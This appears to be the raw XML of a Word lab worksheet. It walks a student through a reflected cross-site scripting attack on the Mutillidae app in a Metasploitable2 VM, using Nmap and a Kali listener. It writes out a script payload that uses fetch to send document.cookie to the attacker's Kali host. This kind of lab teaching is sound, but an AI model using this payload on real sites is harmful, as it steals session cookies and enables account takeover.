    <w:p w14:paraId="6C90051B" w14:textId="77777777" w:rsidR="000B17E2" w:rsidRPr="000B17E2" w:rsidRDefault="000B17E2" w:rsidP="000B17E2"/>
    <w:p w14:paraId="4198272F" w14:textId="77777777" w:rsidR="000B17E2" w:rsidRPr="000B17E2" w:rsidRDefault="000B17E2" w:rsidP="000B17E2"/>
    <w:p w14:paraId="54D0C6AD" w14:textId="77777777" w:rsidR="000B17E2" w:rsidRPr="000B17E2" w:rsidRDefault="000B17E2" w:rsidP="000B17E2"/>
    <w:p w14:paraId="30C2B2B1" w14:textId="77777777" w:rsidR="000B17E2" w:rsidRPr="000B17E2" w:rsidRDefault="000B17E2" w:rsidP="000B17E2"/>
    <w:p w14:paraId="24D0D9C9" w14:textId="77777777" w:rsidR="000B17E2" w:rsidRPr="000B17E2" w:rsidRDefault="000B17E2" w:rsidP="000B17E2"/>
    <w:p w14:paraId="58E90CAE" w14:textId="77777777" w:rsidR="000B17E2" w:rsidRPr="000B17E2" w:rsidRDefault="000B17E2" w:rsidP="000B17E2"/>
    <w:p w14:paraId="1253B116" w14:textId="77777777" w:rsidR="000B17E2" w:rsidRPr="000B17E2" w:rsidRDefault="000B17E2" w:rsidP="000B17E2"/>
    <w:p w14:paraId="0B0076B8" w14:textId="77777777" w:rsidR="000B17E2" w:rsidRDefault="000B17E2" w:rsidP="000B17E2"/>
    <w:p w14:paraId="7884E4DA" w14:textId="77777777" w:rsidR="000B17E2" w:rsidRDefault="000B17E2" w:rsidP="000B17E2"/>
    <w:p w14:paraId="1BC8B1E8" w14:textId="77777777" w:rsidR="000B17E2" w:rsidRDefault="000B17E2" w:rsidP="000B17E2"/>
    <w:p w14:paraId="18FBA4E9" w14:textId="1B9666A7" w:rsidR="005B6040" w:rsidRDefault="002D36B6" w:rsidP="007D2C56">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6298"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc224731501"/>
      <w:r w:rsidRPr="002D36B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Advanced Exploitation Lab</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidR="007D2C56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D97C4D" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00242E5C">
        <w:t>Record the Ip address of Metasploitable2 VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52825224" w14:textId="6AA6D557" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00242E5C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="273D7E65" wp14:editId="1836FB46">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>285115</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5107940" cy="3307715"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:wrapNone/>
            <wp:docPr id="902508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508524" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5107940" cy="3307715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00242E5C">
        <w:t>The Ip address is 192.168.1.27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C960372" w14:textId="4670A641" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="520F1A7C" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="2877DA72" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="19040143" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="49B12382" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="2BAC0699" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="0185E34B" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="086D6135" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="6736E121" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="45556083" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="5E459174" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="033F63FA" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="26299E1C" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="095F9A04" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="40FA8C05" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="63AFF8EB" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="3F67A124" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="059DC4B0" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="108F48EA" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="63ECFC97" w14:textId="12EC089F" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00242E5C">
        <w:t>Run Nmap in Kali Linux to search for vulnerable ports and services in Metasploitable2 VM. There is a vulnerable web application port 80 open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A326EB" w14:textId="2FD17E6E" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:r w:rsidRPr="00242E5C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50ABC7FA" wp14:editId="72B6F2DC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3755</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4238045" cy="3505367"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="859532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532999" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4243666" cy="3510016"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F18B4BA" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="61DA159D" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="067C2445" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="638824AF" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="78F4418F" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="4D84120B" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="5EB51D04" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="6527074E" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="255027E9" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="098F1D9A" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="143927BA" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="2C5C6C1C" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="17402738" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="4D8E1FC0" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="18D1527B" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="086A991B" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="0F17D0B1" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="1FADCEE0" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="69E6202B" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7501"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00242E5C">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6D05B0" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7501"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00242E5C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1805DDD3" wp14:editId="371D73CD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>269848</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3832529" cy="3215427"/>
            <wp:effectExtent l="19050" t="19050" r="15875" b="23495"/>
            <wp:wrapNone/>
            <wp:docPr id="1651081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081798" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3832529" cy="3215427"/>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Pr="00242E5C">
        <w:t>Open the web application in Kali Linux and select Multillidae.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7FF247" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7501"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707E5040" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="38D9ABE0" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="11A37756" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="4725D23E" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="10FF709D" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="328FF394" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="5780459D" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="6EFB717F" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="5843DE2E" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="694F8B4A" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="223CB376" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="3AD4B4B9" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="01C5F897" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="4B13FD5D" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="3F3E10B2" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="4B13445F" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="3D32C3D5" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="5F8F9B9E" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00242E5C">
        <w:t xml:space="preserve">Go to OWASP Top 10 </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E5C">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00242E5C">
        <w:t xml:space="preserve"> Cross Site Scripting </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E5C">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00242E5C">
        <w:t xml:space="preserve"> Reflected </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E5C">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00242E5C">
        <w:t xml:space="preserve"> DNS Lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2351E30D" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00242E5C">
        <w:t>Enter the below payload with the Ip address of Kali Linux machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17803DB8" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242E5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;script&gt; fetch("http://192.168.1.35:8080/cookie?c="+document.cookie) &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCC8713" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A66A578" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00242E5C">
        <w:t>Start a listener in Kali Linux machine using the below command and then click ‘Lookup DNS’ button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE69D98" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00242E5C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="250C30C7" wp14:editId="570AF47B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>84261</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5252665" cy="2977052"/>
            <wp:effectExtent l="19050" t="19050" r="24765" b="13970"/>
            <wp:wrapNone/>
            <wp:docPr id="758418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418240" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId11">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="44260"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267951" cy="298571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038C87B" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D6FDEB1" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07BEF523" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43CEE21B" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="72C50DF5" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="0CB55C47" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="24A1D567" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="6F84A070" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="4E0BE897" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="63112E3D" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="00DD8268" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="5BFE6DD0" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="688A5646" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="4F7985F9" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="456D3833" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="77EEAAC5" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="39E6C518" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="6523F432" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="2F5C1122" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00242E5C" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:r w:rsidRPr="00242E5C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3436205F" wp14:editId="5824A4C1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4772691" cy="1228896"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="389495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495117" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4772691" cy="1228896"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
